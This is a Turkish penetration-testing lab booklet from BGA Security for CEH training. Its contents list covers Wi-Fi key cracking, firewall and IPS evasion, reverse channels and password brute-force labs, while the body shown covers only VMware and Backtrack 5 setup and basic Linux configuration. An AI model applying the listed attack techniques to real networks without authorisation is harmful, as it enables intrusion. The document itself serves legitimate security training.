BGA eğitmenleri tarafından hazırlanan Beyaz Şapkalı Hacker (CEH) Laboratuvar Kitabıdır. Dokümanı https://www.bgasecurity.com/makale/beyaz-sapkali-hacker-ceh-lab-kitabi/ adresimiz üzerinden indirebilirsiniz.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
İÇİNDEKİLER
BGA Hakkında
Backtrack Temel Ayarları
CEH Eğitimi Lab Çalışmaları
Hedef Hakkında Bilgi Toplama
UygulamaAdı: Hedef SistemHakkındaTemel BilgiToplama
UygulamaAdı: Bir IPAdresi ÜzerindekiSitelerinBulunması
UygulamaAdı: Siteye AitGeçmişİçeriğinİncelenmesi
UygulamaAdı: Siteye AitAlt AlanAdlarınınBelirlenmesi
UygulamaAdı: Hedef Domaine Ait E-postaAdreslerininBelirlenmesi
UygulamaAdı: Google KullanarakBilgi Toplama
UygulamaAdı: ShodanHqKullanarakBilgi Toplama
UygulamaAdı: Hedef Sisteme AitAğHaritasınınBelirlenmesi
UygulamaAdı: Hedef SistemAğve GüvenlikSistemlerini Belirleme
UygulamaAdı: DNS ÜzerindenBilgi Toplama
UygulamaAdı: DNS Zone Transferi Kontrolü
UygulamaAdı: DNS Sunucuversionbilgisi bulma
UygulamaAdı: SMTP ÜzerindenİçAğ IP Yapısının Belirlenmesi
UygulamaAdı: SNMP ÜzerindenBilgi Toplama
UygulamaAdı: NmapKullanarakAçıkSistemlerinBelirlenmesi
UygulamaAdı: NmapKullanarakTCP/UDPPortTarama
UygulamaAdı: NmapKullanarakÇalışanServisSürümleriniBelirleme
UygulamaAdı: NmapKullanarakBelirliIP aralığındaki belirli PortAralığınıTarama
UygulamaAdı: Sahte IP/TuzakSistemlerKullanarakPortTarama
UygulamaAdı: NSE Kullanarakgüvenlikaçığıtesbitetme
UygulamaAdı: SYN ProxyKullanılanSistemlere YönelikPortTarama
UygulamaAdı: NmapKullanarak İşletimSistemi Belirleme
UygulamaAdı: NmapGUI/ZenmapKullanarakPortTarama
UygulamaAdı: NmapNSE ile SMB Dosyapaylaşımlarınıtespitetmek
Kablosuz Ağlar
UygulamaAdı: İşletimSistemine KablosuzAğAdaptörününTanıtılması
UygulamaAdı: Wifi AğAdaptörünüMonitorModa Geçirme
UygulamaAdı: Gizli OlarakAyarlanmışKablosuzAğlarınKeşfi
UygulamaAdı: WEP Şifreleme KullanılanAğlaraYönelikŞifre Kırma
UygulamaAdı: WPA KullanılanAğlardaŞifre Kırma
UygulamaAdı: WPS Destekli AğlarınKeşfi ve Ağ GirişParolasınınBulunması
UygulamaAdı: KablosuzAğlaraYönelikDoSTestleri
UygulamaAdı: Sahte KablosuzAğErişimNoktası[Fake AP] Oluşturulması
UygulamaAdı: MAC AdresFiltreleme Atlatma
UygulamaAdı: WindowsSistemdeKAyıtlıWifi ParolalarınınBulunması
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Firewall/IPS/İçerikFiltreme AtlatmaLab Uygulamaları
UygulamaAdı: Firewall,WAF,SaldırıEngellemeSistemi Keşif Çalışması
UygulamaAdı: SSH Tüneli KullanarakFirewall/IPS/CFAtlatmaÇalışması
UygulamaAdı: DNS Tünelleme KullanarakFirewall/IPS/CFAtlatmaÇalışması
UygulamaAdı: Ultrasurf ve TOR KullanarakİçerikFiltreleme SistemleriniAtlatma
UygulamaAdı: Şifreleme KullanarakIPSAtlatma
UygulamaAdı: Tersine Kanal AçmaYöntemleri
UygulamaAdı: ParçalanmışPaketlerleGüvenlikDuvarıAtlatma
Şifre Parola Kırma Saldırıları Lab Uygulamaları
UygulamaAdı: MD5, SHA1, SSHA512 Hasli ParolalarıKırmak
UygulamaAdı: JohnThe RipperKullanarakLinux ParolalarınıKırma
UygulamaAdı: JohnThe RipperKullanarak Cisco/JuniperParolalarınıKırma
UygulamaAdı: Cain&Abel KullanarakParolaKırmaSaldırıları
UygulamaAdı: OclHashcatKullanarakParolaKırma Saldırıları
UygulamaAdı: Crunch Kullanarakİsteğe Göre SözlükListesi Oluşturma
UygulamaAdı: InternettenSözlük Listeleri İndirme
UygulamaAdı: InternettenHashArama
UygulamaAdı: Hash, Şifreleme,EncodingTipini Belirleme
UygulamaAdı:Hydra KullanarakOnline Brute Force Atakları
UygulamaAdı: MedusaKullanarakSSH,FTP Servislerine YönelikBrute Force
UygulamaAdı: MetasploitAux KullanarakWindowsParolaBrute Force Atakları
UygulamaAdı: Ncrack KullanarakRDPBrute Force Atakları
UygulamaAdı: HTTP Basic AuthKorumalıSitelere YönelikBrute Force
5.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
BGA Bilgi Güvenliği A.Ş. Hakkında
BGA Bilgi Güvenliği A.Ş. 2008 yılından bu yana siber güvenlik alanında faaliyet göstermektedir.
Ülkemizdeki bilgi güvenliği sektörüne profesyonel anlamda destek olmak amacı ile kurulan BGA Bilgi
Güvenliği, stratejik siber güvenlik danışmanlığı ve güvenlik eğitimleri konularında kurumlara hizmet
vermektedir.
Uluslararası geçerliliğe sahip sertifikalı 50 kişilik teknik ekibi ile, faaliyetlerini Ankara ve İstanbul ve
USA’da sürdüren BGA Bilgi Güvenliği’nin ilgi alanlarını “Sızma Testleri, Güvenlik Denetimi, SOME, SOC
Danışmanlığı, Açık Kaynak Siber Güvenlik Çözümleri, Büyük Veri Güvenlik Analizi ve Yeni Nesil
Güvenlik Çözümleri”oluşturmaktadır.
Gerçekleştirdiği başarılı danışmanlık projeleri ve eğitimlerle sektörde saygın bir yer edinen BGA Bilgi
Güvenliği, kurulduğu günden bugüne alanında lider finans, enerji, telekom ve kamu kuruluşlarına
1.000'den fazlaeğitimve danışmanlıkprojelerigerçekleştirmiştir.
BGA Bilgi Güvenliği, kurulduğu 2008 yılından beri ülkemizde bilgi güvenliği konusundaki bilgi ve
paylaşımların artması amacı ile güvenlik e-posta listeleri oluşturulması, seminerler, güvenlik etkinlikleri
düzenlenmesi, üniversite öğrencilerine kariyer ve bilgi sağlamak için siber güvenlik kampları
düzenlenmesi ve sosyal sorumlulukprojeleri gibi birçokkonudagönüllüfaaliyetlerde bulunmuştur.
BGA Bilgi Güvenliği AKADEMİSİ Hakkında
BGA Bilgi GüvenliğiA.Ş.’nineğitimve sosyalsorumlulukmarkasıolarakçalışanBilgi Güvenliği
AKADEMİSİ,sibergüvenlikkonusundaticari,gönüllüeğitimlerindüzenlenmesi ve sibergüvenlik
farkındalığını arttırıcı gönüllüfaaliyetleri yürütülmesindensorumludur.Bilgi Güvenliği AKADEMİSİ
markasıylabugüne kadar“SiberGüvenlik Kampları”,“SiberGüvenlikStaj Okulu”,“SiberGüvenlikAr-Ge
DestekBursu”, ”Ethical Hacking yarışmaları” ve “SiberGüvenlikKütüphanesi” gibi birçok gönüllü
faaliyetindestekleyici olmuştur.
6.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Vmware SanallaştırmaPlatformu
Vmware bir sanallaştırma yazılımıdır. Tek bir fiziksel makinada, birden çok işletim sistemini bir
birinden bağımsız ve aynı anda çalıştırmayı sağlar.
Fiziksel donanımları sanallaştırarak her bir işletim sisteminde ayrı ayrı kullanır.
Vmware player ücretsiz olarak indirip kullanılabilir. Linux ve Windows sitemleri destekler.
Windows Sistemlere Vmware Player Kurulumu
Kurulum sihirbazı çalıştırılarak Windows sistemlere kurulum başlatılabilir.
Ön Gereksinimler
1. 32 bit veya 64 bit windows işletim sistemi
2. Windows XP ve sonrası sistemler
3. Minimum 2 GB RAM
4. Minimum 20 GB boş disk alanı
5. Minimum 1 adet Ethernet kartı
Kurulum Aşaması
1. Windows işletim sisteminize, program kurma yetkisi olan bir kullanıcı hesabı ile giriş
yapınız.
2. Aşağıdaki adresden windows işletim sisteminize uygun olan vmware player sürümü
indiriniz.
https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player
/5_0
3. Kurulum dosyasını ‘VMware-Player-xxxx-xxxx.exe’ çift tıklayarak, kurulum sihirbazı
çalıştırın ve varsayılan ayarlarla kurulumu sonlandırın.
Linux Sistemlere Vmware Player Kurulumu
Vmware player bir çok linux dağıtımı desteklemektedir. Popüler linux dağıtımlarında kurulum
sihirbazı grafik arabirimden çalıştırılarak kurulum tamamlanabilir. Redhat Linux gibi bazı
dağıtımlarda komut satırından kurulum yapmanız gerekebilir. Bu durumda kurulum dosyası –
console seçeneği ile komut satırından başlatılabilir.
7.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ön Gereksinimler
1. 32 bit veya 64 bit windows işletim sistemi
2. Windows XP ve sonrası sistemler
3. Minimum 2 GB RAM
4. Minimum 20 GB boş disk alanı
5. Minimum 1 adet Ethernet kartı
Kurulum sonrası işletim sisteminizi yeniden başlatıp Vmware Player çalıştırınız.
Kurulum Aşaması
1. Linux tabanlı işletim sisteminize giriş yapın.
2. Kurulum için ‘root’ haklarına geçiş yapın. Örneğin; ‘su root’
3. Aşağıdaki adresden linux işletim sisteminize uygun olan vmware player sürümü indiriniz.
https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player
/5_0
4. Komut satırından ‘sh VMware-Player-e.x.p-xxxx-xxxx.architecture.bundle’ komutu ile
kurulum sihirbazını başlatın ve varsayılan ayarlarla kurulumu tamamlayın.
Kurulum sonrası root haklarına tekrar ihtiyacınız olmayacaktır. İşletim sisteminizi yeniden
başlatıp Vmware Player çalıştırınız.
8.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Vmware Player Pencereleri
Bu aşamadan sonraki tüm anlatılanlar, Linux ve Windows sistemlerden bağımsız vmware player
özellikleridir.
Home penceresi, yeni bir Sanal Makina (Virtual Machine) oluşturmak, varolan sanal
makina imajını açmak yada vmware player için yardım almakda kullanılır.
9.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Yeni Sanal İşletim Sistemi Oluşturmak
Home menüsünden ‘Create a New Virtual Machine’ seçeneği ile yeni bir sanal işletim sistemi
kurulumu başlatılabilir.
1. İlk adımda, kurulacak işletim sisteminin kaynağı seçilmeldir.
1.1. İşletim sistemi CD ROM aracılığı ile seçilebilir.
1.2. İşletim sisteminin .iso dosyası diskden seçilebilir.
1.3. Veya sonraya ertelenebilir.
Vmware Player, Windows ve bazı popüler Linux dağıtımları için kurulum tipini otomotik
algılayabilmektedir ve kolay kurulum sihirbazı ile devam etmektedir. Seçim yapıldıkdan sonra
‘Next’ seçeneği ile sonraki adıma geçilir.
2. Windows 7 kurulumunu algıladı ve kolay kurulum sihirbazını başlattı. Burada lisans bilgileri
ve windows bilgileri tamamlanarak hızlı kurulum başlatılabilir. Bu aşadaman sonra Windows
7 kurulum ile ilgili ek bir soru ile karşılaşmayacaksınız.
10.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
3. Sanal makina adı ve kurulum dosyalarının tutulacağı dizin varsayılan ayarlarla bırakılabilir.
Kurulum dosyalarını farklı bir dizinde saklayabilir ve kurulum amacına uygun bir isim ile
devam edebilirsiniz.
11.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4. Disk kapasitesi işletim sistemi türüne gore otomotik olarak atanır fakat minimum
gereksinimleri göz önünde bulundurarak mevcut disk kapasitenize gore yükseltebilir veya
azaltabilirsiniz.
5. Son aşamaya geldiğinizde kurulum özeti ile bilgilendirileceksiniz. ‘Finish’ seçeneği ile
yapılandırmayı bitirdiğinizde kurulum otomotik olarak başlayacaktır.
12.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Windows kurulumundan bir görünüm
Varolan Bir Vmware İmajını içe Aktarmak
Vmware aracılığıyla kurulan sanal işletim sistemleri taşınabilir, kopyalanabilir. Örneğin evinizde
hazırladığınız ve hali hazırda kullandığınız bir windows vmware imajını ofisinize taşıyabilir bire
bir aynı ayarlarla ofisinizdeki vmware aracılığıyla kullanabilirsiniz.
Aşağıdaki örnekde Centos 5 vmware imajı içe aktarılmıştır.
Bir vmware imajını içe aktarma işlemi ‘Home’ sekmesinden ‘Open a Virtual Machine’ seçeneği
seçilerek VMware imajının yolu seçilir.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
VMware Tools Kurulumu
VMware Tools, sanal makinanın performanslı çalışmasını ve gerçek işletim sistemi ile kolay
entegre olmasını sağlar. VMware tools kurulumu sonrası, gerçek bilgisayarınızdan dosyaları
sanal işletim sistemine sürükle bırak yöntemi ile aktarabilir, metinleri kopyala/yapıştır vb. Işleler
yapabilirsiniz.
Windows SistemlereVmware Tools Kurulumu
1. Player > Manage > İnstall VMware Tools Installation sekmesinden kurulum başlatılabilir.
Eğer VMware Tools bilgisayarınızda yoksa otomotik olarak internetten indirilecektir.
2. VMware Tools sanal CDROM aracılığı ile işletim sistemine bağlanacaktır. Eğer autorun
otomotik olarak başlamazsa ‘Bilgisayarım > DVD Drive’ çift tıklanarak kurulum başlatılabilir.
3. Kurulum sihirbazı aracılığıyla varsayılan ayarlar ile kurulum tamamlanabilir. Kurulum
başarıyla tamamlandıkdan sonra sisteminizi yeniden başlatınız.
Linux Sistemlere Vmware Tools Kurulumu
1. Player > Manage > İnstall VMware Tools Installation sekmesinden kurulum başlatılabilir.
Eğer VMware Tools bilgisayarınızda yoksa otomotik olarak internetten indirilecektir.
2. VMware Tools sanal CDROMaracılığı ile işletimsistemine bağlanacaktır.
3. Aşağıdaki komutlar ile vmware tools default ayarları ile kurulur.
15.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
# cd /media/VMware Tools/
# tar zxf VMwareTools-9.2.2-893683.tar.gz -C /tmp/
# cd /tmp/vmware-tools-distrib/
# perl vmware-install.pl –d
Kurulum başarıyla tamamlandıkdan sonra, ‘reboot’ komutu ile backtrack 5 işletim sisteminin
yeniden başlatılmasını tafsiye ederim.
VMware Network Ayarları
Ağ arabirimleri üç farklı bağlantı türünü destekler;
1. Bridge: Sanal ağ arabirimi, bağlı bulunduğu fiziksel network ile haberleşebilir. Yerel ağda
bulunan DHCP sunucudan ip alabilir veya sabit ip ayarları ile fiziksel ağa dahil olabilir. Yerel
ağa bir bilgisayar dahil etmişsiniz gibi düşünebilirsiniz. Sanal bir ağ arabirimi fakat kendine
ait bir MAC adresi bulunuyor ve kendi MAC adresi ile yerel ağda iletişim kuruyor.
2. NAT: VMware üzerinde çalışan sanal işletim sistemlerinin yerel ağa kapalı kendi aralarında
iletişim kurabildikleri sanal bir ağdır. Sanal makinalara sabit ip adresi tanımlanabilir veya
vmware dhcp servisi ile otomotik ip adresi alınabilir. Sanal sistemler aynı zamanda VMware
kurulu gerçek işletim sistemi ile haberleşebilirler.
3. HostOnly: Yalnızca sanal işletim sistemlerinin bir birleri ile haberleştiği tamamen dış
dünyaya kapalı bir ağ yapısıdır.
VMware network ayarları aşağıdaki seçeneklerle değiştirilebilir;
‘Player > Manager > Virtual Machine Settings > Network Adapters’
16.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Backrack 5 bölümünde bu ayarların detayları uygulamalı olarak aktarılmıştır.
VMware Ağ ArabirimininMac Adresini Değiştirmek
VMware sanal ağ arabirimlerinin kendisine ait Mac adresleri vardır. Ağ arabiriminin Mac
adresini görüntülemek ve gerektiğinde değiştirmek için ‘Player > Manager > Virtual Machine
Settings > Network Adapters > Advanced’ seçeneği kullanılabilir.
17.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
‘Mac Address’ bölümünden ‘Generate’ butonu ile yeni Mac adresi üretilebilir.
Backtrack 5 R3 Kurulumu
Bu kitapda yer alan uygulamalar ve metasploit framework backtrack 5 r3 işletim sistemi
kullanılarak gerçekleştirilmiştir.
Backtrack, Ubuntu linux temelli bir dağıtımdır. Güvenlik uzmanları ve hackerlar için
oluşturulmuş içerisinde açık kaynak kodlu güvenlik araçlarının hali hazırda kategoriler halinde
sunulduğu bir dağıtımdır.
Ağ analizi , sızma testleri (penetrasyon testi), bilgisayar ağlarında adli bilişim, zararlı yazılım
analizi gibi konularda araştırma/çalışma yapan uzmanların sıklıkla kullandığı ve geliştirdiği
ücretsiz ve açık kaynak bir çok yazılımı bünyesinde barındırır.
Backtrack Linux dağıtımı iki farklı şekilde çalışmaktadır;
Kurulum gerektirmeksizin, LiveCD ile
Diske kurulum yaparak
CD’den çalıştırma yönteminin performansı, CD okuyucunun hızına gore değişecektir. CD yalnızca
okunabilir olduğundan yalnızca harici disk kullanabilirseniz very depolama imkanınız olacaktır.
Tafsiye edilen yöntem, Backtrack dağıtımını diske kurmak veya sanallaştırma platformlarında
kullanmak.
Backtrack Temelleri
Backtrack GNOME ve KDE masaüstü ortamlarına sahiptir. İndirme seçeneklerinden, alışık
olduğunuz veya tercih edebileceğiniz masaüstü ortamına sahip olabilirsiniz. Bu kitapta gnome
kullanılmıştır ve gnome masaüstü ortamı önerilir.
Backtrack, asıl gücünü komut satırından alır Tüm linux sistemlerin en güçlü yönetim arabirimi
komut satırı (konsoldur). Grafik arabirim kullanılarak erişilebilecek programların çoğu komut
satırından çalışan programların/scriptlerin düzenli hale getirilmiş halidir.
Backtrack Kurulumu
Backtrack 5 aşağıdaki adresden, donanım mimarisine uygun 31 bit ve 64 bit seçenekleri ile
indirilebilir.
18.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
http://www.backtrack-linux.org/downloads/
AdımAdım VMware Imajı Oluşturmak
1. ‘Home > Create a New Virtual Machine’
2. ‘Installer Disc Image’ seçeneği ile Backtrack .iso yerel bilgisayarımızdan seçilir.
3. Backtrack Ubuntu tabanlı bir linux dağıtımı olduğu için, işletim sistemi olarak Linux ve
version olarak Ubuntu seçilerek devam edilir.
19.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4. Sanal işletim sistemine bir isim ve kurulum dizini tanımlanır. Kurulum dizini varsayılan
ayarlarla bırakılabilir.
5. Disk kapasitesi ön tanımlı olarak 20 GB gelmektedir. Çalışma süresince 20 GB ideal bir disk
alanıdır. İhtiyacınıza gore bu değeri arttırabilirsiniz.
20.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
6. Son adımda oluşturulacak VMware imajının ayarları özetlenmektedir. Kurulum sihirbazında
bizim belirlediğimiz değerler dışında, RAM varsayılan olarak 1024 MB, 1 CPU ve ağ arabirimi
NAT modunda tanımlanmaktadır. Kurulum tamamlanmadan ‘Customize Hardware’ seçeneği
ile sanal donanım bileşenlerinde değişiklikler yapılabilir.
Donanım özelliklerinize gore bu değerleri arttırabilirsiniz. Kurulum tamamlanmadan once RAM
2 GB, 2 core CPU ve ağ arabirimi Bridge mod olarak tanımlanmıştır.
Bu aşamdan sonra VMware imajı başarıyla oluşturuldu. Kuruluma için ‘Play virtual machine’
butonuna tıklayarak başlayabiliriz.
21.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
AdımAdım Backtrack Kurulumu
Backtrack dağıtımı bir çok farklı çalışma prensibine sahiptir. Diske kurulum için birinci sırada
bulunan ‘Default Boot’ seçeneği ile devam ediyoruz.
Sistem açılışında komut satırı ile karşılaşacaksınız. Bu aşamdan sonra grafik arabirime geçmek
için ‘startx’ komutu çalıştırılır.
Backtrack masaüstünde bulunan ‘Install BackTrack’ çift tıklanarak kurulum sihirbazı başlatılır.
1. İlk aşamada kurulum dili seçilir. Kurulum dilleri arasında Türkçe’de bulunmaktadır fakat biz
İngilizce ile devam edeceğiz.
22.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2. Bölgesel dil ayarları, bulunduğunuz konuma uygun olarak seçebilirsiniz. Seçim için haritayıda
kullanabilirsiniz.
3. Bu adımda klavye dili ayarları tanımlanır.Seçenekler arasında Türkçe dil ayalarıda bulunuyor.
Seçim yaptıkdan sonra sol alt kutucuğu test için kullanabilirsiniz.
23.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4. Disk seçimi
5. Son aşamada kurulum özetini gözden geçirip, herşey yolundayse ‘install’ seçeneği ile diske
kurulumu başlatabiliriz. Kurulum otomotik olarak tamamlanacaktır.
24.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Kurulum tamamlandıkdan sonra sistemi yeniden başlatınız.
Backtrack VMware İmajı Kullanımı
Yukarıdaki indirme sayfasından, Backtrack VMware Imajı indirilerek kolaylıkla kullanılabilir.
BT5R3-GNOME-VM-32.7z sıkıştırılmış bir dosyadır. 7zip veya winrar arşiv yöneticisi
programlarından biri aracılığı ile arşiv dosyası açılabilir.
‘ VMware Player > Home > Open a Virtual Machine ‘ seçeneği ile BT5R3-GNOME-VM-32.vmx
dosyası seçilerek içeri aktarma işi tamamlanır.
25.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Bu işlemden sonra Backtrack VMware Player ortamına aktarılmış ve kullanıma hazırdır. ‘Play
Virtual Machine’ butonu ile işletim sistemi başlatılır.
Güncelleme
26.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Backtrack linux dağıtımı ve hali hazırda kurulu gelen bir çok yazılım sürekli güncellenmekde ve
yeni yazılımlar eklenmektedir. Backtrack Linux dağıtımını ve kurulu uygulamaları sürekli güncel
tutmak ve yeni yazılımlarda pratiklik kazanmak en önemli gereksinimlerimizdendir.
Paket DeposunuGüncelleme
Backtrack Linux dağıtımı kendi depolarına sahiptir. Depoların listesine aşağıdaki komutla
ulaşabilirsiniz. - Bu yalnıca bilgi amaçlıdır, güncelleme ile doğrudan bir ilişkisi yoktur. –
# cat /etc/apt/sources.list
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
#deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing
Depodaki güncellemeleri almak için aşağıdaki komut çalıştırılır.
# apt-get update
Uygulama Güncelleme
27.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Tek bir uygulamayı yeni versiyonuna yükseltme veya yazılımın eksikliklerini gidermek için
yayımlanan güncellemeleri yüklemek için aşağıdaki komut kullanılır.
# apt-get upgrade <paket_adı>
Örnek Uygulama Güncelleme
# apt-get upgrade nmap
Backtrack Linux Dağıtımını Güncelleme
Backtrack Linux dağıtımı her geçen yıl geliştirilmekte, yeni uygulamalar eklenip/çıkarılmakta,
yeni driverlar ve çeşitli linux güncellemeleri içermektedir.
Sahip olduğunuz Backtrack Linux dağıtımını yeni sürümünü yükseltmek için aşağıdaki komut
kullanılır.
# apt-get dist-upgrade
Genel Ayarlar
Hostname
Backtrack Linux dağıtımının makina adı ‘hostname’ komutu ile öğrenilebilir.
# hostname
28.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Makina adı aşağıdaki şekilde değiştirilir
# hostname pentest
Password
Backtrack Linux işletim sisteminde bulunan bir kullanıcının parolasını değiştirmek için aşağıdaki
komut kullanılır.
# passwd kullanıcı_adı
Backtrack Linux işletim sisteminde bulunan kullanıcı bilgileri hakkında
/etc/passwd
/etc/shadow
dosyalarında parola bilgisi dahil olmak üzere bilgi edinilebilir.
Klavye
Backtrack Linux işletim sisteminde bulunan klavye ayarları aşağıdaki komut ile anlık olarak
değiştirilebilir. değiştirilebilir.,
# setxkbmap tr
Bu değişiklik sadece oturum süreniz boyunca geçerli olacaktır. Backtrack yeniden
başlatıldığında ayarlar kaybolur.
Klavye ayarlarını kalıcı olarak değiştirmek için;
System > Preferences > Keyboard menüsü açılır.
Açılan menünün sol baştan ikinci sekmesi olan ‘Layouts’ sekmesine geçiş yapılır. Bu pencerede
‘Add’ butonuna tıklanarak açılan yeni pencereden ‘Country: Turkey’ olarak seçilir ve ‘Add’
butonuna tıklanarak listeye eklenir. ‘USA’ dile seçeneğine ihtiyacınız yoksa bu seçimi ‘Remove’
butonu ile kaldırabilirsiniz.
29.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Klavyenizi test etmek için pencerenin en altında bulunan ‘Type to test settings’ bölümünü
kullanabilirsiniz.
Ekran Çözünürlüğü
VMware aracılığı ile kullandığınız işletim sistemlerinde eğer vmtools kurulu değilse ekran
görüntü çözünürlüğünü değiştirmede sorunlar yaşarsınız. VMware aracılığıyla kullandığınız
işletim sistemlerine mutlaka vmtool kurmanızı öneririm.
Backtrack Linux dağıtımında ekran çözünürlüğünü değiştirmek için aşağıdaki menu yolunu
tıklayınız;
‘System > Preferences > Monitors’ penceresinden ‘Resolution’ sekmesi kullanılarak size uygun
çözünürlüğü ayarlayabilirsiniz.
30.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Network Ayarları
Ağ ayarlarını diğer tüm sistemlerde olduğu gibi sabit olarak veya bulunduğunuz ortamda
otomotik IP dağıtan bir dhcp sunucu varsa dinamik olarak tanımlanabilir. Ağ ayarlarını
yapmadığınız durumda, dahil olduğunuz bir ağdaki diğer sistemlerle haberleşemezsiniz.
Dhcp ile IP Almak
Bulunduğunuz ortamdaki dhcp sunuculardan IP almak için, ‘dhclient’ komutunu kullanabilirsiniz.
Yukarıda görüldüğü gibi, bulunduğum ağdaki 6.6.6.1 sunucusu bana IP isteği için yanıt verdi ve
‘6.6.6.101’ IP adresini tahsis etti.
31.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Sabit IP Ataması
Linux sistemlerde ağ ayarları ‘ifconfig’ komutu ve parametreleri ile yönetilir. Ağ ayarlarını
görüntülemek ve değişiklikler yapmak için ‘ifconfig’ komutu kullanılır.
Kullanılabilir ağ arabirimlerini görüntümek için ‘ifconfig –a’ yazmanız yeterli olacaktır.
Görüldüğü üzere ‘eth1’ ve ‘lo’ ağ arabirimlerine sahibiz. Farklı sistemlerde ‘eth1’ yerine ‘ethx’
olabilir. Bu aşamadan sonraki ayarları mevcut ağ arabiriminizin adını öğrenerek devam edin.
Örnek olarak, eth1 ağ arabirimine 1.1.1.100 ip adresini tanımlayacağım.
# ifconfig eth1 1.1.1.100
Bir ağ arabirimi ayarlarını görüntülemek için hatırlayacağınız üzere ifconfig komutu
kullanabiliriz.
32.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Gateway Tanımlama
Yalnızca IP adresi tanımlamak yerel ağdaki sistemlerle haberleşmek için yeterli. Fakat internete
çıkmak için varsayılan ağ geçici (Gateway) tanımlamamız gerekiyor.
Bu örnekde, eth1 ağ arabirimi üzerinden internete çıkmak istediğimde varsayılan ağ geçici
olarak 1.1.1.1 ip adresini tanımlayacağım. 1.1.1.1 ip adresi size internete bağlayacak
modem/firewall/router ip adresi olarak düşünebilirsiniz.
# route add default gw 1.1.1.1
Değişiklik başarıyla gerçekleştikden sonra, ayarları görüntülemek için ‘route –n’ komutunu
